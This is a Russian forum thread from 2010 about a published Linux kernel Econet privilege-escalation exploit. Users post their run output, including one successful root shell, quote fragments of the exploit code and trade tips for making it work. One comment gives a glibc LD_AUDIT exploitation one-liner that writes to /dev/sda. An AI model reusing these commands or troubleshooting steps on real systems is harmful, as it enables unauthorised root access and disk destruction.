|
2.4, Marbleless (?), 17:09, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>слово "эксплоит" относится к "эксплуатации" ?
Трудно сказать, относится ли оно напрямую в английском языке (поскольку exploit, скорее всего, заимствовано из французского), но уж точно не в русском.
Исправить нужно. "Остановка работы ядра", "эксплуатация уязвимостей" (так пойдет), "взлом", на худой конец. Новый способ эксплуатации ядра Линукс - это, например, читать исходный код в виде рэпа.
| |
|
3.6, Зилибоба (ok), 17:16, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Эксплойт, эксплоит (англ. exploit, эксплуатировать) — это компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DoS-атака).
Чего тут можно сказать трудно?
| |
|
4.16, Marbleless (?), 17:48, 08/12/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>Эксплойт, эксплоит (англ. exploit, эксплуатировать)
Вот тут должна стоять ссылка на источник. Я серьезно. На тот, в котором выведена связь слова эксплоит в этом значении с английским глаголом "exploit" в значении "эксплуатировать". Версия с французским "exploit" (достижение) кажется более правдоподобной.
На всякий случай: мой предыдущий комментарий относился к той версии новости, в которой был заголовок "новый способ эксплуатации Linux-ядра".
| |
|
5.27, Vkni (?), 18:30, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> На всякий случай: мой предыдущий комментарий относился к той версии новости, в
> которой был заголовок "новый способ эксплуатации Linux-ядра".
Ну это-то очевидный бред. Эксплуатация уязвимости, а на ядра :-).
| |
|
6.29, sndev (ok), 18:32, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
ИМАО, лучше всего звучало бы так :
"Представлен новый способ эксплуатации локальной уязвимости/ошибки Линукс-ядра"
| |
|
|
|
3.63, tr (?), 05:01, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Definition of EXPLOIT
: deed, act; especially : a notable or heroic act
Origin of EXPLOIT
Middle English espleit, expleit, exploit furtherance, outcome, from Anglo-French, from Latin explicitum, neuter of explicitus, past participle
First Known Use: circa 1538
Источник: Merriam-Webster
| |
|
2.46, Харитон (?), 21:12, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
exploit
I ˈeksplɔɪt
сущ.
деяние, подвиг
to perform an exploit — совершать подвиг
fantastic exploits — фантастические/сказочные похождения
heroic exploit — геройский поступок
Syn:
act, deed, feat
II ɪksˈplɔɪt
гл.
1)
а) пользоваться, использовать, эксплуатировать
Syn:
utilize
б) перен. играть (на чьих-либо чувствах, слабости и т.д.), пользоваться (чем-л. в своих интересах)
Sometimes it is necessary to exploit your opponent's weakness. — Иногда просто необходимо воспользоваться слабостью оппонентов.
2) разрабатывать (шахты, копи, месторождения и т.д.)
| |
|
3.55, Aleks Revo (?), 22:50, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Вот он и ответ: "сыграть на слабости" - буквальный смысл того, что понимается под эксплойтом.
| |
|
|
1.9, daevy (ok), 17:22, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
$ ./exploit
[*] Failed to open file descriptors.
$ uname -a
Linux deceiver 2.6.35-gentoo-r8 #2 SMP Tue Nov 23 14:15:10 YEKT 2010 x86_64 Intel(R) Core(TM)2 Duo CPU E7500 @ 2.93GHz GenuineIntel GNU/Linux
опять чото не работает.
| |
|
2.25, Xaionaro (ok), 18:21, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Заставьте работать:
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
econet подгружен?
Вообще, вроде ж Gentoo используйте. Не позорились бы ;)
| |
|
3.52, bircoph (?), 22:07, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Привет,
а вот у меня в ядрах и -fstack-protector-all
# CONFIG_ECONET is not set
мне теперь всё пересобирать, чтоб эксплойт запустить? :3
| |
|
4.98, Xaionaro (ok), 10:50, 02/02/2011 [^] [^^] [^^^] [ответить]
| +/– |
> Привет,
> а вот у меня в ядрах и -fstack-protector-all
> # CONFIG_ECONET is not set
> мне теперь всё пересобирать, чтоб эксплойт запустить? :3
Как хочешь. Но обвинять эксплойт в неработоспособности, если небыли предоставлены необходимые для его работы условия (в соответствии с его назначением) - глуповато, IMHO.
| |
|
3.89, Wormik (ok), 21:26, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Заставьте работать:
> pipe(fildes);
> fildes[2] = socket(PF_ECONET, SOCK_DGRAM,
> 0);
> fildes[3] = open("/dev/zero", O_RDONLY);
> econet подгружен?
> Вообще, вроде ж Gentoo используйте. Не позорились бы ;)
Использую Gentoo 5 лет. Ни разу не открывал исходный код в редакторах, как и не накладывал сам патчи.
| |
|
|
3.74, daevy (ok), 13:33, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
+ возможность самому написать сценарии сборки для свежего ПО недожидаясь когда оно появится в репах и оверлеях
+ paludis в качестве пакет.менеджера, очень гибок, другие менеджеры что я использовал меня не впечатлили
+ различные сборки ядер, особенно харденед, есть конечно падение производительности, но по крайне мере можно не ссать кипятком, когда выходят дыры аналогичные дырам в glibc
+ да и как то исторически сложилось так...
p.s. толсто
| |
|
4.76, коксюзер (?), 13:51, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> по крайне мере можно не ссать кипятком, когда выходят дыры аналогичные
> дырам в glibc
Внезапно: hardened был подвержен уязвимости при обработке LD_AUDIT в glibc. И уязвимость эту (вторую) "не могли" закрыть около двух недель.
| |
|
5.81, daevy (ok), 16:34, 09/12/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
собранный с use hardened? наверно я что-то пропустил, видел инфу только про обычный glibc-2.11.2, если не затруднит скиньте ссылку пожалуйста
| |
|
6.83, коксюзер (?), 18:19, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Я не видел линков, где что-то конкретное говорится на тему (не)уязвимости glibc[hardened]. Можете поставить glibc в чруте из старых ебилдов и проверить сами: http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/sys-libs/glibc/?hidea
Portage не даст продаунгрейдить glibc, смените версию в имени ебилда на *-r4. Уязвимые версии, включительно: с 2.11.2 по 2.11.2-r2 (сам проверял на hardened) и 2.12.1 по 2.12.1-r2 (не проверял). А USE=hardened добавляет только патчи совместимости с hardened-тулчейном. Ничего против таких уязвимостей там нет.
| |
6.85, taaroa (ok), 19:33, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
ах да, запускать примерно так:
umask 0 ; LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/dev/sda" ping
| |
|
7.91, daevy (ok), 08:53, 10/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
решил воспроизвести, и получаю при
$ exec 3< /tmp/exploit/target
bash: /tmp/exploit/target: Permission denied
а раньше получалось... есть идеи? тачка тестовая необновленная точно.
glibc-2.11.2
bash-4.0.37(2)
| |
|
|
|
4.77, PereresusNeVlezaetBuggy (ok), 13:54, 09/12/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
> + возможность самому написать сценарии сборки для свежего ПО недожидаясь когда оно
> появится в репах и оверлеях
Любая система портов это позволяет. Просто делаете свой репозиторий, или просто порт, или где как оно называется.
> + paludis в качестве пакет.менеджера, очень гибок, другие менеджеры что я использовал
> меня не впечатлили
Чем гибок? Какие практические проблемы, существующие не только в рамках Gentoo, решает эта гибкость? Я серьёзно.
| |
|
5.79, daevy (ok), 14:55, 09/12/2010 [^] [^^] [^^^] [ответить] | +/– | 1 слоты, сравнивая с убунту-менеджером, недавно понадобилось поставить postgres... большой текст свёрнут, показать | |
|
|
|
|
1.11, Аноним (-), 17:27, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
a@server:~$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa050219b
[+] Resolved econet_ops to 0xffffffffa05031c0
[*] Failed to resolve kernel symbols.
a@server:~$ uname -a
Linux server 2.6.26-2-amd64 #1 SMP Thu Nov 25 04:30:55 UTC 2010 x86_64 GNU/Linux
a@server:~$ cat /etc/debian_version
5.0.7
| |
|
2.13, Anon (?), 17:38, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
b@server:~$ ./b.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa050219b
[+] Resolved econet_ops to 0xffffffffa05031c0
[*] Failed to resolve kernel symbols.
b@server:~$ uname -a
Linux server 2.6.26-2-xen-amd64 #1 SMP Thu Aug 20 00:36:34 UTC 2009 x86_64 GNU/Linux
b@server:~$ cat /etc/debian_version
5.0.6
| |
|
3.22, Xaionaro (ok), 18:10, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Ну, судя по всему программа не отработала, а ругнулась на вполне конкретную ошибку, требуя соответствующих мероприятий. Например, если заглянуть в код, то рождается гипотеза, что у вас не подгружен econet. :)
| |
|
|
|
2.14, PereresusNeVlezaetBuggy (ok), 17:41, 08/12/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
> и на мандриве (2.6.35.9) тоже не работает...
Жаль, что форум фактически анонимный. Так можно было бы составлять чёрные списки «кого не брать на работу за неумение читать текст и править код».
| |
|
3.20, emg81 (?), 18:07, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
о, мсье, а по-Вашему все пользователи GNU/Linux должны уметь править код?
| |
|
4.23, Xaionaro (ok), 18:11, 08/12/2010 [^] [^^] [^^^] [ответить]
| +6 +/– |
> о, мсье, а по-Вашему все пользователи GNU/Linux должны уметь править код?
Люди, интересующееся exploit-ами, должны, IMHO.
| |
|
5.67, zazik (ok), 09:33, 09/12/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
> И особенно те, которые пытаются их запускать :) имхо
Зачем? Если бы все ответственно подходили к тому, что запускают, эксплоиты вымерли бы как класс.
| |
|
|
|
|
1.15, анонимище (?), 17:46, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Тем у кого не работает:
>Опубликованный код эксплойта оформлен в виде прототипа, намеренно модифицированного для защиты от необдуманного использования неискушенными обывателями (для его работы в RedHat, Slackware и Debian потребуется модификация, а для Ubuntu ранее было выпущено обновление с исправлением проблем CVE-2010-3849 и CVE-2010-385). | |
1.17, Аноним (17), 17:49, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
levko@levko-lb:~$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa019707b
[+] Resolved commit_creds to 0xffffffff810624fa
[+] Resolved prepare_kernel_cred to 0xffffffff810623f4
[*] Failed to resolve kernel symbols.
levko@levko-lb:~$ uname -a
Linux levko-lb 2.6.36 #7 SMP Wed Nov 17 19:43:34 EET 2010 x86_64 GNU/Linux
levko@levko-lb:~$ lsb_release -d
Description: Ubuntu 10.10
| |
|
2.24, Xaionaro (ok), 18:14, 08/12/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
Вы пробывали хотя бы заглянуть в код, в то место, где выводится данная ошибка? Там несколькими строками выше написано какие symbol-ы требуются. И достаточно несложно удовлетворить этим требованиям.
| |
|
1.19, emg81 (?), 18:06, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
[emg81@emg81pc ~]$ ./a.out
[*] Failed to open file descriptors.
[emg81@emg81pc ~]$ uname -a
Linux emg81pc 2.6.36-ARCH #1 SMP PREEMPT Wed Nov 24 06:44:11 UTC 2010 i686 Intel(R) Pentium(R) 4 CPU 3.20GHz GenuineIntel GNU/Linux
---
:(
опять не работает
| |
|
2.21, Аноним (-), 18:10, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Текст новости еще раз (если этого не было сделано ранее) перечитайте.
Опубликованный код эксплоита оформлен в виде прототипа, намеренно модифицированного для защиты от необдуманного использования неискушенными обывателями
| |
|
3.58, Аноним (-), 23:27, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
uname -r
2.6.36-ARCH
zcat /proc/config.gz | grep -i econet
# CONFIG_ECONET is not set
| |
|
|
1.28, Hugo Reyes (?), 18:32, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Есть workaround, который можно применить в ожидании новой сборки ядра от мэнтейнера:
echo 1 > /proc/sys/kernel/panic_on_oops
По-крайней мере будет обычный DoS вместо эскалации привилегий.
| |
|
2.54, гы (?), 22:45, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> По-крайней мере будет обычный DoS вместо эскалации привилегий.
а где сказано что через эту уязвимость возможно повышение привелегий????
| |
|
1.30, Аноним (-), 18:39, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
>fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
grep -i econet /boot/config-2.6.32-71.7.1.el6.i686
# CONFIG_ECONET is not set
для работы експлойта под линукс мне надо канпелировать ядро?
| |
|
2.31, Аноним (-), 19:46, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> для работы експлойта под линукс мне надо канпелировать ядро?
Достаточно найти другой баг, приводящий к oops, коих пачками в каждом новом обновлении ядра правят.
| |
|
3.34, Аноним (-), 20:05, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>> для работы експлойта под линукс мне надо канпелировать ядро?
> Достаточно найти другой баг, приводящий к oops, коих пачками в каждом новом
> обновлении ядра правят.
The Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, 6, and Red Hat Enterprise MRG enabled the panic_on_oops sysctl tunable by default, and therefore are not affected by this issue.
и отключать kernel.panic_on_oops = 1
| |
|
|
1.33, Горлов (?), 20:01, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
main@main-desktop /tmp $ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf0b052a0
[+] Resolved econet_ops to 0xf0b053a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) группы=0(root)
#
Linux main-desktop 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
| |
|
2.36, itsme (??), 20:10, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>[оверквотинг удален]
> [+] Resolved commit_creds to 0xc016c830
> [+] Resolved prepare_kernel_cred to 0xc016cc80
> [*] Calculating target...
> [*] Triggering payload...
> [*] Got root!
> # id
> uid=0(root) gid=0(root) группы=0(root)
> #
> Linux main-desktop 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686
> GNU/Linux
А что нужно подправить, чтобы эксплойт зарабовал???
| |
|
3.37, Горлов (?), 20:12, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Я вообще ничего не правил. Он сходу заработал, сразу после компиляции.
| |
|
4.39, itsme (??), 20:14, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Я вообще ничего не правил. Он сходу заработал, сразу после компиляции.
Уже наверное на 10 машинах проверил, везде:
[*] Failed to open file descriptors.
| |
|
|
6.56, Viliar (ok), 23:16, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Вы слишком много хотите :-) Страшными словами бросаетесь в бедных людей ;-D
| |
|
7.59, Аноним (-), 23:37, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Вы слишком много хотите :-) Страшными словами бросаетесь в бедных людей ;-D
gcc ./sploit.c
strace ./a.out
...
...
socket(PF_ECONET, SOCK_DGRAM, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
...
Проблема тут: fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
И ошибку получаешь после проверки на открытый дескриптор: if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0)
| |
|
|
|
|
3.38, Аноним (-), 20:13, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>[оверквотинг удален]
>> [+] Resolved prepare_kernel_cred to 0xc016cc80
>> [*] Calculating target...
>> [*] Triggering payload...
>> [*] Got root!
>> # id
>> uid=0(root) gid=0(root) группы=0(root)
>> #
>> Linux main-desktop 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686
>> GNU/Linux
> А что нужно подправить, чтобы эксплойт зарабовал???
мой юный дrуг, uid=0 говоrит нам о том, что эксплойт заrаботал
| |
|
4.40, itsme (??), 20:16, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>[оверквотинг удален]
>>> [*] Calculating target...
>>> [*] Triggering payload...
>>> [*] Got root!
>>> # id
>>> uid=0(root) gid=0(root) группы=0(root)
>>> #
>>> Linux main-desktop 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686
>>> GNU/Linux
>> А что нужно подправить, чтобы эксплойт зарабовал???
> мой юный дrуг, uid=0 говоrит нам о том, что эксплойт заrаботал
100% с Вами согласен. Но ведь выше написано, что это концепт и что нужно что-то подправить, чтобы он заработал. У меня не работает. Как я уже писал выше - испытывал на нескольких машинах, с разными версиями ядра.
А где можно такой достать - http://www.youtube.com/watch?v=M4TTAupmV5U ?
| |
|
5.45, Аноним (-), 21:01, 08/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
> 100% с Вами согласен. Но ведь выше написано, что это концепт и
> что нужно что-то подправить, чтобы он заработал. У меня не
> работает. Как я уже писал выше - испытывал на нескольких машинах,
> с разными версиями ядра.
У того у кого эксплойт заработал ядро старое непатченное, сейчас уже 2.6.35-26 на дворе, а у него еще 2.6.35-22.
| |
|
6.70, Горлов (?), 10:37, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Обновил ядро, теперь не работает :-( Что в эксплоите нужно поменять, чтоб заработало? :-)
main@main-desktop ~ $ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf0ade340
[+] Resolved econet_ops to 0xf0ade440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Exploit failed to get root
main@main-desktop ~ $ uname -a
Linux main-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC 2010 i686 GNU/Linux
| |
|
7.73, z (??), 13:16, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Что в эксплоите нужно поменять, чтоб заработало?
payload, очевидно же
| |
|
|
|
|
|
2.41, Горлов (?), 20:19, 08/12/2010 [^] [^^] [^^^] [ответить] | +/– | В консоли посыпалось после этого 36538 318571 BUG unable to handle kern... большой текст свёрнут, показать | |
|
1.47, Аноним (-), 21:15, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
openSUSE 11.3 – хрен там
socket(PF_ECONET, SOCK_DGRAM, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
| |
1.51, deadless (?), 21:52, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
насколько уязвим линукс не знает никто, но со 100% вероятностью можно сказать что дыры в нем были есть и будут. не дырявое корыто конечно, но и не бронебойная крепость. страдать от этих дыр в целом могут только всеразличные vps которые редко кто апгрейдит вовремя. Прошерстите всех наиболее популярных vps'ников, увидите наколько там ядра поросли мхом.
Почему бы Линузу не изменить концепцию и не посвятить скажем хотябы месяц в году на выявление дыр? Важнее выпекать новое ядро каждые 2 месяца чем заниматься безопастностью, да и конечно прикладывать любимые костыли начиная с RBAC и заканчивая виртуалками в виртуалках.
| |
1.53, Аноним (-), 22:43, 08/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
[ken@box tmp]$ ./ex
[*] Failed to open file descriptors.
[ken@box tmp]$ uname -a
Linux box 2.6.35.9-64.fc14.i686 #1 SMP Fri Dec 3 12:35:42 UTC 2010 i686 i686 i386 GNU/Linux
| |
|
2.65, Xaionaro (ok), 08:25, 09/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
Я уже устал комментировать, поясняя, что "вы просто не умеете готовить". Почитайте комментарии выше.
| |
|
|
4.87, odus (ok), 21:15, 09/12/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
> может стоит поискать более интересные занятия?
ищи
| |
|
|
|
1.82, DFX (ok), 17:05, 09/12/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
>> Эксплоит протестирован в системах Ubuntu 10.04 и 10.10 со штатными Linux-ядрами, но теоретически функционирует со всеми Linux-ядрами серии 2.6.x
мир, как всегда, в большой теоритической опасности...
всё таки после вендового детства и пачки remote exploit'ов, да ещё сразу дающих полный "админ"-доступ, всё это как-то уже и не впечатляет.
| |
|
2.92, vle (ok), 15:54, 10/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
У господина Торвальдса есть реальный шанс перевернуть мир IT.
Сново начать писать новую операционную систему вместе с libc
и линкером, сново с нуля, и на этот раз на безопастном языке.
Я уверен, за ним пошло бы много людей, практически с самого
старта проекта, и уже лет через 5 он стал бы вполне взрослым
промышленным проектом, но уже без проблем такого рода.
| |
|
|
4.95, vle (ok), 03:57, 12/12/2010 [^] [^^] [^^^] [ответить]
| +/– |
>> сново с нуля, и на этот раз на безопастном языке.
> на java ?
Не думаю
| |
|
|
|
|